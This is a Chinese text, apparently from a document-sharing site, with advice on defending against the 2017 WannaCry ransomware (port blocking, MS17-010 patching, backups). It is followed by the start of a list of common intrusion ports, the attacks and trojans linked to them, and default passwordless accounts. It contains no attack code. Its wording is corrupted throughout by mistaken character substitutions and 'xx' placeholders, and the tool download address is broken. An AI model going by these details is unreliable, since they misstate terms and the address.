勒索病毒防范措施 在前几天5月12日,英国、意大利、俄罗斯等全球多个国家爆发勒索病毒攻击,中国的校园网也未能幸免,局部高校电脑被感染,有学生被病毒加密,给我们的生活带来很多不便。那么,下面是为大家分享勒索病毒防范措施,欢送大家阅读浏览。 Windows用户可以使用防火墙过滤个人电脑,并且临时关闭135、137、445端口3389远程(如果不想关闭3389远程,至少也是关闭智能卡功能),并注意更新平安产品进展防御,尽量降低电脑受攻击的风险。 在3月MS17-010漏洞刚被爆出的时候,微软已经针对Win7、Win10等系统在内提供了平安更新;此次事件爆发后,微软也迅速对此前尚未提供官方支持的Windows XP等系统了特别补丁。 将指定电脑在关闭Wi-Fi,拔掉网线,断网状态下开机,并尽快备份重要文件;然后通过U盘使用腾讯的“勒索病毒免疫工具”离线版等工具,进展一键修复漏洞;联网即可正常使用电脑。 备份尽快电脑中比拟重要的资料,以免以后再出现类似情况!重要文件资料到移动硬盘、U盘,备份完后脱机保存该磁盘。 安装正版操作系统、Office软件等。不乱下载安装其他软件,对于软件,最好通过虚拟机安装! 一、在网络边界(如校园网出口)上阻断135/137/138/139/445端口的连接请求;在校园网的核心交换设备处阻断 135/137/138/139/445端口的连接请求;在局域网子网边界处阻断135/137/138/139/445端口的连接请求。 二、开展漏洞扫描与修复工作,组织技术力量对本单位的效劳器、PC等进展扫描。尽快完成各类用户Windows系统软件的升级或
漏洞修复。对于WindowsXP、xx等微软已不在提供平安更新的机器,使用360“NSA武器免疫工具”检索系统漏洞,并关闭受漏洞影响的端口。免疫工具下载地址:dl.360safe./nsa/nsatool.exe 三、排查已感染终端数量。对公共设备(显示器、公众终端、效劳器)遭遇感染,应立即采取应急措施,并汇总相关数据报送综合宣传科。 四、重要业务系统要立即进展数据备份,重要业务终端要进展系统镜像,同时,做好网站的维护工作。 五、做好宣传引导、加强舆情监控,及时关注和处置不良舆情的传播,同时,做好防病毒知识的普及。 比特币是一种虚拟货币,不依靠特定机构发行,依据特定算法,通过大量的计算产生。可以购置现实或虚拟物品,也可以兑换成大多数国家的货币。 比特币敲诈病毒(CTB-Locker)最早在xx年初传入中国,随后出现爆发式传播。该病毒通过远程加密用户电脑文件,从而向用户勒索赎金,用户只能在支付赎金后才能翻开文件。 其最新变种的敲诈金额为3个比特币,约合人民币6000余元。该病毒通过伪装成邮件附件,一旦受害者点击运行,就会弹出类似“订单详情”的英文文档。这时病毒已经在系统后台悄悄运行,并将在10分钟后开始发作。 “永恒之蓝”会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和效劳器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 微软今年3月已补丁MS17-010修复了“永恒之蓝”攻击的系统漏洞,请尽快为电脑安装此补丁!并安装杀毒软件。
445端口入侵详解
445 端口入侵详解 篇一:黑客常用入侵端口详解 常见的入侵端口: 端口:0 服务:Reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中 “0”是无效端口, 当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用 IP 地址为 0.0.0.0,设置 ACK 位并在以太网层广播。 (我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查 ip,如果有入侵赶 紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.) 端口:1 服务:tcpmux 说明:这显示有人在寻找 SGI Irix 机器。Irix 是实现 tcpmux 的主要提供者,默认情况下 tcpmux 在这种系统中被打开。Irix 机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX 等。许多管理员在安装后忘记删除这些 帐户。因此 HACKER 在 INTERNET 上搜索 tcpmux 并利用这些帐户。 端口:7 服务:Echo 说明:能看到许多人搜索 Fraggle 放大器时,发送到 X.X.X.0 和 X.X.X.255 的信息。 端口:19 服务:Character Generator 说明:这是一种仅仅发送字符的服务。UDP 版本将会在收到 UDP 包后回应含有垃圾字符 的包。TCP 连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER 利用 IP 欺骗可以发动 DoS 攻击。伪造两个 chargen 服务器之间的 UDP 包。同样 Fraggle DoS 攻击向目标地址的这个 端口广播一个带有伪造受害者 IP 的数据包,受害者为了回应这些数据而过载。 端口:21 服务:FTP 说明: FTP 服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开 anonymous 的 FTP 服务器的方法。 这些服务器带有可读写的目录。 木马 Doly Trojan、 Fore、 Invisible FTP、WebEx、WinCrash 和 Blade Runner 所开放的端口。 1 / 15